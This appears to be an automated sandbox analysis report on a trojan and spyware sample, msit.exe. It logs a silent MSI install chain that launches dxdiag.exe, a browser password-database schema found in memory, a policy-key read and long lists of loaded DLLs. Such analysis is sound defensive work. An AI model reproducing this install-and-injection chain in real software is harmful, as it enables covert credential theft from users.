Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: shi95F5.tmp.0.dr

Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket

Source: msit.exe

Binary or memory string: 2*.vbp

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/42@1/1

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 7_2_00435870 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

7_2_00435870

Source: C:\Users\user\Desktop\msit.exe

File created: C:\Users\user\AppData\Roaming\msit

Jump to behavior

Source: C:\Users\user\Desktop\msit.exe

File created: C:\Users\user\AppData\Local\Temp\shi95F5.tmp

Jump to behavior

Source: msit.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\msit.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\msit.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dxdiag.exe, 00000007.00000003.1615956154.00000000051BA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615564283.00000000051D4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: msit.exe

Virustotal: Detection: 9%

Source: C:\Users\user\Desktop\msit.exe

File read: C:\Users\user\Desktop\msit.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\msit.exe "C:\Users\user\Desktop\msit.exe"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 C
Source: C:\Users\user\Desktop\msit.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 "
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965E
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIA455.tmp "C:\Windows\Installer\MSIA455.tmp"
Source: C:\Windows\Installer\MSIA455.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Users\user\Desktop\msit.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 "	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965E	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIA455.tmp "C:\Windows\Installer\MSIA455.tmp"	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior

Source: C:\Users\user\Desktop\msit.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: lpk.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
